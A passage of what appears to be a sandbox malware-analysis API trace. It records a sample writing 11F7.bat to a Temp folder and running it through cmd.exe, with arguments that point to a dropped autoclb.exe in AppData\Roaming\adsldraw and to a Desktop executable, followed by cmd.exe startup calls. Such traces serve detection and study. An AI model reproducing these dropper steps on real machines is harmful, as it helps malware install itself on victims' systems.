nSize=0x0 | out: lpDst=0x0) returned 0x33 [0055.442] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat", lpDst=0x2359290, nSize=0x33 | out: lpDst="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat") returned 0x33 [0055.442] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\74ee\\11f7.bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0055.442] WriteFile (in: hFile=0x1d8, lpBuffer=0x2358dd0*, nNumberOfBytesToWrite=0x6e, lpNumberOfBytesWritten=0x1f4fe9c, lpOverlapped=0x0 | out: lpBuffer=0x2358dd0*, lpNumberOfBytesWritten=0x1f4fe9c*=0x6e, lpOverlapped=0x0) returned 1 [0055.442] SetEndOfFile (hFile=0x1d8) returned 1 [0055.442] CloseHandle (hObject=0x1d8) returned 1 [0055.443] ShellExecuteW (hwnd=0x0, lpOperation="open", lpFile="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat", lpParameters="\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0058.971] LocalFree (hMem=0x642db0) returned 0x0 [0058.971] HeapDestroy (hHeap=0x1f60000) returned 1 [0058.971] ExitProcess (uExitCode=0x0) Thread: id = 6 os_tid = 0xf2c Thread: id = 7 os_tid = 0xf30 Thread: id = 8 os_tid = 0xf34 Thread: id = 9 os_tid = 0xf38 Thread: id = 10 os_tid = 0xf3c Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x24f38000" os_pid = "0xf40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xda4" cmd_line = "C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat\" \"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00014ee5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 330 start_va = 0x400000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 331 start_va = 0x420000 end_va = 0x421fff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 332 start_va = 0x430000 end_va = 0x443fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 333 start_va = 0x450000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 334 start_va = 0x490000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 335 start_va = 0x590000 end_va = 0x593fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 336 start_va = 0x5a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 337 start_va = 0x5b0000 end_va = 0x5b1fff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 338 start_va = 0x9e0000 end_va = 0xa2ffff entry_point = 0x9e0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 339 start_va = 0xa30000 end_va = 0x4a2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 340 start_va = 0x77ca0000 end_va = 0x77e18fff entry_point = 0x77ca0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 341 start_va = 0x7ea60000 end_va = 0x7ea82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ea60000" filename = "" Region: id = 342 start_va = 0x7ea87000 end_va = 0x7ea87fff entry_point = 0x0 region_type = private name = "private_0x000000007ea87000" filename = "" Region: id = 343 start_va = 0x7ea8b000 end_va = 0x7ea8dfff entry_point = 0x0 region_type = private name = "private_0x000000007ea8b000" filename = "" Region: id = 344 start_va = 0x7ea8e000 end_va = 0x7ea8efff entry_point = 0x0 region_type = private name = "private_0x000000007ea8e000" filename = "" Region: id = 345 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 346 start_va = 0x7fff0000 end_va = 0x7df8ee37ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 347 start_va = 0x7df8ee380000 end_va = 0x7ff8ee37ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df8ee380000" filename = "" Region: id = 348 start_va = 0x7ff8ee380000 end_va = 0x7ff8ee541fff entry_point = 0x7ff8ee380000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 349 start_va = 0x7ff8ee542000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ff8ee542000" filename = "" Region: id = 350 start_va = 0x5c0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 351 start_va = 0x64af0000 end_va = 0x64b62fff entry_point = 0x64af0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 352 start_va = 0x64b70000 end_va = 0x64bbefff entry_point = 0x64b70000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 353 start_va = 0x64ae0000 end_va = 0x64ae7fff entry_point = 0x64ae0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 425 start_va = 0x400000 end_va = 0x40ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 426 start_va = 0x5d0000 end_va = 0x68dfff entry_point = 0x5d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 427 start_va = 0x7b0000 end_va = 0x8affff entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 428 start_va = 0x74e70000 end_va = 0x74fe5fff entry_point = 0x74e70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 429 start_va = 0x75260000 end_va = 0x7534ffff entry_point = 0x75260000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 430 start_va = 0x7e960000 end_va = 0x7ea5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e960000" filename = "" Region: id = 431 start_va = 0x690000 end_va = 0x6cffff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 432 start_va = 0x8b0000 end_va = 0x9affff entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 433 start_va = 0x779f0000 end_va = 0x77aadfff entry_point = 0x779f0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 434 start_va = 0x7ea88000 end_va = 0x7ea8afff entry_point = 0x0 region_type = private name = "private_0x000000007ea88000" filename = "" Region: id = 435 start_va = 0x4bd0000 end_va = 0x4bdffff entry_point = 0x0 region_type = private name = "private_0x0000000004bd0000" filename = "" Region: id = 436 start_va = 0x410000 end_va = 0x413fff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 437 start_va = 0x420000 end_va = 0x423fff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 438 start_va = 0x74bf0000 end_va = 0x74bf7fff entry_point = 0x74bf0000 region_type = mapped_file name = "cmdext.dll" filename = "\\Windows\\SysWOW64\\cmdext.dll" (normalized: "c:\\windows\\syswow64\\cmdext.dll") Region: id = 439 start_va = 0x76a10000 end_va = 0x76a8afff entry_point = 0x76a10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 440 start_va = 0x76c40000 end_va = 0x76c82fff entry_point = 0x76c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 441 start_va = 0x76d90000 end_va = 0x76e3bfff entry_point = 0x76d90000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 442 start_va = 0x74db0000 end_va = 0x74dcdfff entry_point = 0x74db0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 443 start_va = 0x74da0000 end_va = 0x74da9fff entry_point = 0x74da0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 444 start_va = 0x74d40000 end_va = 0x74d98fff entry_point = 0x74d40000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 445 start_va = 0x6d0000 end_va = 0x6dffff entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 446 start_va = 0x4be0000 end_va = 0x4f16fff entry_point = 0x4be0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 638 start_va = 0x6e0000 end_va = 0x700fff entry_point = 0x6e0000 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cmd.exe.mui") Thread: id = 11 os_tid = 0xf44 [0065.299] GetModuleHandleA (lpModuleName=0x0) returned 0x9e0000 [0065.299] __set_app_type (_Type=0x1) [0065.299] __p__fmode () returned 0x77aa4d6c [0065.299] __p__commode () returned 0x77aa5b1c [0065.299] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x9f36e0) returned 0x0 [0065.299] __getmainargs (in: _Argc=0xa050e8, _Argv=0xa050ec, _Env=0xa050f0, _DoWildCard=0, _StartInfo=0xa050fc | out: _Argc=0xa050e8, _Argv=0xa050ec, _Env=0xa050f0) returned 0 [0065.300] GetCurrentThreadId () returned 0xf44 [0065.300] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf44) returned 0x84 [0065.300] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75260000 [0065.300] GetProcAddress (hModule=0x75260000, lpProcName="SetThreadUILanguage") returned 0x752a2780 [0065.300] SetThreadUILanguage (LangId=0x0) returned 0x409 [0065.309] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0065.309] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x58fb54 | out: phkResult=0x58fb54*=0x0) returned 0x2 [0065.310] VirtualQuery (in: lpAddress=0x58fb5b, lpBuffer=0x58fb0c, dwLength=0x1c | out: lpBuffer=0x58fb0c*(BaseAddress=0x58f000, AllocationBase=0x490000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0065.310] VirtualQuery (in: lpAddress=0x490000, lpBuffer=0x58fb0c, dwLength=0x1c | out: lpBuffer=0x58fb0c*(BaseAddress=0x490000, AllocationBase=0x490000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0065.310] VirtualQuery (in: lpAddress=0x491000, lpBuffer=0x58fb0c, dwLength=0x1c | out: lpBuffer=0x58fb0c*(BaseAddress=0x491000, AllocationBase=0x490000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0065.310] VirtualQuery (in: lpAddress=0x493000, lpBuffer=0x58fb0c, dwLength=0x1c | out: lpBuffer=0x58fb0c*(BaseAddress=0x493000, AllocationBase=0x490000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0065.310] VirtualQuery (in: lpAddress=0x590000, lpBuffer=0x58fb0c, dwLength=0x1c | out: lpBuffer=0x58fb0c*(BaseAddress=0x590000, AllocationBase=0x590000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0065.310] GetConsoleOutputCP () returned 0x1b5 [0065.311] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xa0e460 | out: lpCPInfo=0xa0e460) returned 1 [0065.311] SetConsoleCtrlHandler (HandlerRoutine=0x9ff980, Add=1) returned 1 [0065.311] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.312] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0065.315] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.315] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0e40c | out: lpMode=0xa0e40c) returned 1 [0065.315] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.315] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0065.316] _get_osfhandle (_FileHandle=0) returned 0x38 [0065.316] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xa0e408 | out: lpMode=0xa0e408) returned 1 [0065.316] _get_osfhandle (_FileHandle=0) returned 0x38 [0065.316] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0065.317] GetEnvironmentStringsW () returned 0x7b7f30* [0065.317] FreeEnvironmentStringsA (penv="A") returned 1 [0065.317] GetEnvironmentStringsW () returned 0x7b7f30* [0065.317] FreeEnvironmentStringsA (penv="A") returned 1 [0065.317] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x58eab8 | out: phkResult=0x58eab8*=0x94) returned 0x0 [0065.318] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x58eabc, lpData=0x58eac4, lpcbData=0x58eac0*=0x1000 | out: lpType=0x58eabc*=0x0, lpData=0x58eac4*=0x79, lpcbData=0x58eac0*=0x1000) returned 0x2 [0065.318] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x58eabc, lpData=0x58eac4, lpcbData=0x58eac0*=0x1000 | out: lpType=0x58eabc*=0x4, lpData=0x58eac4*=0x1, lpcbData=0x58eac0*=0x4) returned 0x0 [0065.318] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x58eabc, lpData=0x58eac4, lpcbData=0x58eac0*=0x1000 | out: lpType=0x58eabc*=0x0, lpData=0x58eac4*=0x1, lpcbData=0x58eac0*=0x1000) returned 0x2 [0065.318] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x58eabc, lpData=0x58eac4, lpcbData=0x58eac0*=0x1000 | out: lpType=0x58eabc*=0x4, lpData=0x58eac4*=0x0, lpcbData=0x58eac0*=0x4) returned 0x0 [0065.318] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x58eabc, lpData=0x58eac4, lpcbData=0x58eac0*=0x1000 | out: lpType=0x58eabc*=0x4, lpData=0x58eac4*=0x40, lpcbData=0x58eac0*=0x4) returned 0x0 [0065.318] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x58eabc, lpData=0x58eac4, lpcbData=0x58eac0*=0x1000 | out: lpType=0x58eabc*=0x4, lpData=0x58eac4*=0x40, lpcbData=0x58eac0*=0x4) returned 0x0 [0065.318] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x58eabc, lpData=0x58eac4, lpcbData=0x58eac0*=0x1000 | out: lpType=0x58eabc*=0x0, lpData=0x58eac4*=0x40, lpcbData=0x58eac0*=0x1000) returned 0x2 [0065.318] RegCloseKey (hKey=0x94) returned 0x0 [0065.318] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x58eab8 | out: phkResult=0x58eab8*=0x94) returned 0x0 [0065.318] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x58eabc, lpData=0x58eac4, lpcbData=0x58eac0*=0x1000 | out: lpType=0x58eabc*=0x0, lpData=0x58eac4*=0x40, lpcbData=0x58eac0*=0x1000) returned 0x2 [0065.318] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x58eabc, lpData=0x58eac4, lpcbData=0x58eac0*=0x1000 | out: lpType=0x58eabc*=0x4, lpData=0x58eac4*=0x1, lpcbData=0x58eac0*=0x4) returned 0x0 [0065.318] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x58eabc, lpData=0x58eac4, lpcbData=0x58eac0*=0x1000 | out: lpType=0x58eabc*=0x0, lpData=0x58eac4*=0x1, lpcbData=0x58eac0*=0x1000) returned 0x2 [0065.318] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x58eabc, lpData=0x58eac4, lpcbData=0x58eac0*=0x1000 | out: lpType=0x58eabc*=0x4, lpData=0x58eac4*=0x0, lpcbData=0x58eac0*=0x4) returned 0x0 [0065.318] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x58eabc, lpData=0x58eac4, lpcbData=0x58eac0*=0x1000 | out: lpType=0x58eabc*=0x4, lpData=0x58eac4*=0x9, lpcbData=0x58eac0*=0x4) returned 0x0 [0065.318] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x58eabc, lpData=0x58eac4, lpcbData=0x58eac0*=0x1000 | out: lpType=0x58eabc*=0x4, lpData=0x58eac4*=0x9, lpcbData=0x58eac0*=0x4) returned 0x0 [0065.319] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x58eabc, lpData=0x58eac4, lpcbData=0x58eac0*=0x1000 | out: lpType=0x58eabc*=0x0, lpData=0x58eac4*=0x9, lpcbData=0x58eac0*=0x1000) returned 0x2 [0065.319] RegCloseKey (hKey=0x94) returned 0x0 [0065.319] time (in: timer=0x0 | out: timer=0x0) returned 0x5be179f0 [0065.319] srand (_Seed=0x5be179f0) [0065.319] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat\" \"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"\"" [0065.319] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat\" \"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"\"" [0065.319] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xa16720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0065.319] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7b7f38, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0065.319] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xa0e4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0065.319] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xa0e4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0065.319] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xa0e4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0065.319] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0065.319] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0065.319] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0065.320] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0065.320] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0065.320] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0065.320] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0065.320] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0065.320] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0065.320] GetEnvironmentStringsW () returned 0x7b8148* [0065.320] FreeEnvironmentStringsA (penv="A") returned 1 [0065.320] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xa0e4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0065.320] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xa0e4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0065.320] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0065.320] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0065.320] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0065.320] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0065.321] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0065.321] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0065.321] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0065.321] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0065.321] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x58f890 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0065.321] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x58f890, lpFilePart=0x58f888 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x58f888*="Desktop") returned 0x1d [0065.321] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0065.322] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x58f610 | out: lpFindFileData=0x58f610) returned 0x7b05c8 [0065.322] FindClose (in: hFindFile=0x7b05c8 | out: hFindFile=0x7b05c8) returned 1 [0065.322] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x58f610 | out: lpFindFileData=0x58f610) returned 0x7b05c8 [0065.323] FindClose (in: hFindFile=0x7b05c8 | out: hFindFile=0x7b05c8) returned 1 [0065.323] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0065.323] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x58f610 | out: lpFindFileData=0x58f610) returned 0x7b05c8 [0065.323] FindClose (in: hFindFile=0x7b05c8 | out: hFindFile=0x7b05c8) returned 1 [0065.323] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0065.323] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0065.323] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0065.323] GetEnvironmentStringsW () returned 0x7b8148* [0065.324] FreeEnvironmentStringsA (penv="=") returned 1 [0065.324] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xa16720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0065.325] GetConsoleOutputCP () returned 0x1b5 [0065.325] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xa0e460 | out: lpCPInfo=0xa0e460) returned 1 [0065.325] GetUserDefaultLCID () returned 0x409 [0065.326] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xa124a0, cchData=8 | out: lpLCData=":") returned 2 [0065.326] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x58f9c0, cchData=128 | out: lpLCData="0") returned 2 [0065.326] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x58f9c0, cchData=128 | out: lpLCData="0") returned 2 [0065.326] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x58f9c0, cchData=128 | out: lpLCData="1") returned 2 [0065.327] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xa124b0, cchData=8 | out: lpLCData="/") returned 2 [0065.327] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xa12500, cchData=32 | out: lpLCData="Mon") returned 4 [0065.327] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xa12540, cchData=32 | out: lpLCData="Tue") returned 4 [0065.327] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xa12580, cchData=32 | out: lpLCData="Wed") returned 4 [0065.327] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xa125c0, cchData=32 | out: lpLCData="Thu") returned 4 [0065.327] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xa12600, cchData=32 | out: lpLCData="Fri") returned 4 [0065.327] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xa12640, cchData=32 | out: lpLCData="Sat") returned 4 [0065.327] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xa12680, cchData=32 | out: lpLCData="Sun") returned 4 [0065.327] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xa124c0, cchData=8 | out: lpLCData=".") returned 2 [0065.327] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xa124e0, cchData=8 | out: lpLCData=",") returned 2 [0065.327] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0065.329] GetConsoleTitleW (in: lpConsoleTitle=0x7baa98, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0065.329] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75260000 [0065.329] GetProcAddress (hModule=0x75260000, lpProcName="CopyFileExW") returned 0x7527fa80 [0065.330] GetProcAddress (hModule=0x75260000, lpProcName="IsDebuggerPresent") returned 0x7527a790 [0065.330] GetProcAddress (hModule=0x75260000, lpProcName="SetConsoleInputExeNameW") returned 0x74f835c0 [0065.331] _wcsicmp (_String1="\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat\"", _String2=")") returned -7 [0065.331] _wcsicmp (_String1="FOR", 